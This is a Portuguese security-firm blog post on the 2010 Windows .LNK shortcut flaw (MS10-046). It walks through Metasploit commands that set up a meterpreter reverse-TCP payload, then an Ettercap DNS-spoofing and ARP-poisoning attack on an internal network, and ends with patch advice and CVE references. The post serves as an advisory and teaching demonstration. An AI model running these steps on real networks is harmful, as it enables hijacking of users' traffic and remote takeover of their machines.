Linkedin-in Youtube Twitter Facebook-f Instagram
  • +55 (11) 3255 -3926
  • contato@ibliss.com.br
  • Home
  • A IBLISS
    • Responsabilidade Social
  • Nossos Serviços
    • Consultoria em Cibersegurança
    • Teste de Intrusão
    • Conscientização & Cultura
    • Serviços Gerenciados
    • Compliance & Governança
    • AppSec & DevSecOps
  • Conteúdos
    • Blog
    • Materiais Ricos
    • Boletins de vulnerabilidades
  • Oportunidades
  • Contato
IBLISS Digital Security
  • A IBLISS
    • Nossa Equipe
    • Responsabilidade Social
  • Aviso de Privacidade
  • Blog Minuto Proteção
  • Boletins de vulnerabilidades
  • Contato
  • E-book Programa de Conscientização em Segurança da Informação
  • Home
  • IBLISS + GAT Security score
  • Infográfico Gestão de Vulnerabilidades – um passo em direção a um caminho seguro
  • Infográfico Por que investir em um Programa de Conscientização?
  • Infográfico RESILIÊNCIA CIBERNÉTICA
  • Materiais Ricos
  • Nosso Propósito
  • Nossos Serviços
    • AppSec & DevSecOps
      • Análise SAST e DAST
      • Revisão de Segurança (ASVS)
    • Compliance & Governança
    • Conscientização & Cultura
    • Consultoria em Cibersegurança
      • Teste de Intrusão
    • Serviços Gerenciados
  • Oportunidades
  • Parceiros tecnológicos
  • Política de Cookies
  • Política de segurança da informação – fornecedores, parceiros e prestadores de serviços
  • Política de Segurança de Alto Nível

Blog Minuto Proteção

  • Home
  • Blog Minuto Proteção
  • Segurança Digital
  • Perigo em atalhos do Windows .LNK
Segurança Digital

Perigo em atalhos do Windows .LNK

Recentemente foi detectada uma vulnerabilidade que afetas os principais sistemas operacionais da família Microsoft: Windows Server 2003, Windows Server 2008, Windows Vista, XP e 7.

A vulnerabilidade ocorre em atalhos com extensão .LNK ou .PIF e permite que seja invocada alguma DLL maliciosa. Esta é uma vulnerabilidade de alta criticidade e caso algum atacante consiga explorá-la, obteria os mesmos privilégios do usuário local autenticado na máquina, assim seria possível a execução de códigos remotamente.

A seguir estarei dando um exemplo de como está vulnerabilidade poderia vir ser explorada.

Na demonstração abaixo foi utilizado os programas Metasploit e Ettercap.

——————————————————————————————————————————–

Abra o console do Metasploit e siga os comandos abaixo:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set LHOST 192.168.106.134

set PAYLOAD windows/meterpreter/reverse_tcp

Em outro Terminal:

#kate /usr/share/ettercap/etter.dns

Coloque o parâmetro abaixo na última linha.

*.*.* A X.X.X.X

Onde, X.X.X.X é o seu endereço IP

Salve o arquivo etter.dns.

#ettercap -T -q -P dns_spoof -M ARP // //

No Terminal do metasploit:

exploit

——————————————————————————————————————————–

Quando algum computador da rede interna solicitar uma página Web para o servidor DNS o mesmo será exploitado, pois o verdadeiro servidor DNS foi spoofado.

O que foi feito?

O ataque demonstrado acima é uma simulação de ataque efetuada em uma rede interna. O Metasploit foi configurado de modo a ficar aguardando conexões para o módulo do exploit.

Utilizando o Ettercap foi realizado um DNS Spoof e um ARP Poisoning em toda a rede interna, personificando o servidor DNS e alterando toda a tabela de endereços MAC do roteador ou switch utilizado pela rede. Este ataque tem o objetivo de fazer com que toda solicitação de resolução de nomes de domínio enviada ao servidor DNS, sejam agora enviadas para o computador do atacante. No momento em que os demais usuários da rede abrem seus navegadores com o intuito do visualizar alguma página Web, eles são conectados ao módulo do exploit que está aguardando conexões.

Recomendação:

Para corrigir o problema acima deve ser instalado o patch de correção, segundo a referência abaixo

http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx

Referência da Vulnerabilidade:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568

http://www.osvdb.org/66387

Conclusão

Como podemos observar, sempre surgem vulnerabilidades 0-Day inesperadas em sistemas e não podemos simplesmente confiar na atualização do Windows Update.

Até a próxima 🙂

Exploit Pentest Vulnerabilidades
ModSecurity 2 – Instalação e Configuração para Ubuntu 9.04 e Debian 5.04
23 de maio de 2010
Mais um colaborador certificado CEH!!!
6 de outubro de 2010

Leave a comment Cancelar resposta

Você precisa fazer o login para publicar um comentário.

Postagens Recentes

  • O Papel da Segurança da Informação no Caso PIX: Lições dos Controles NIST e ISO 27001
  • IBLISS anuncia nova fase de crescimento e reforça time executivo com foco em CTEM
  • Qual a importância em investir em um Programa de Conscientização?
  • Teste de Invasão: Conheça as principais vantagens
  • A importância dos testes de invasão para médias e pequenas empresas

Contato

Av. Angélica, 2582
2° Andar
CEP 01228-200
Bela Vista
São Paulo / SP

contato@ibliss.com.br

+55 (11) 3255 -3926

Links

  • A IBLISS
  • Nossos Serviços
  • Blog
  • Oportunidades
  • Contato
  • Aviso de Privacidade
  • Política de Cookies
  • Política de Segurança de Alto Nível
  • PSI – Fornecedores & Parceiros

Siga a IBLISS

Linkedin Youtube Facebook Instagram Twitter

Newsletter

© 2022 IBLISS Digital Security. Todos os direitos reservados. Desenvolvido por QMove.

Utilizamos cookies e outras tecnologias semelhantes para garantir que você obtenha a melhor experiência em nosso site. Consulte a Política de Cookies. Além disso, ao continuar navegando, você está ciente com o nosso Aviso de Privacidade.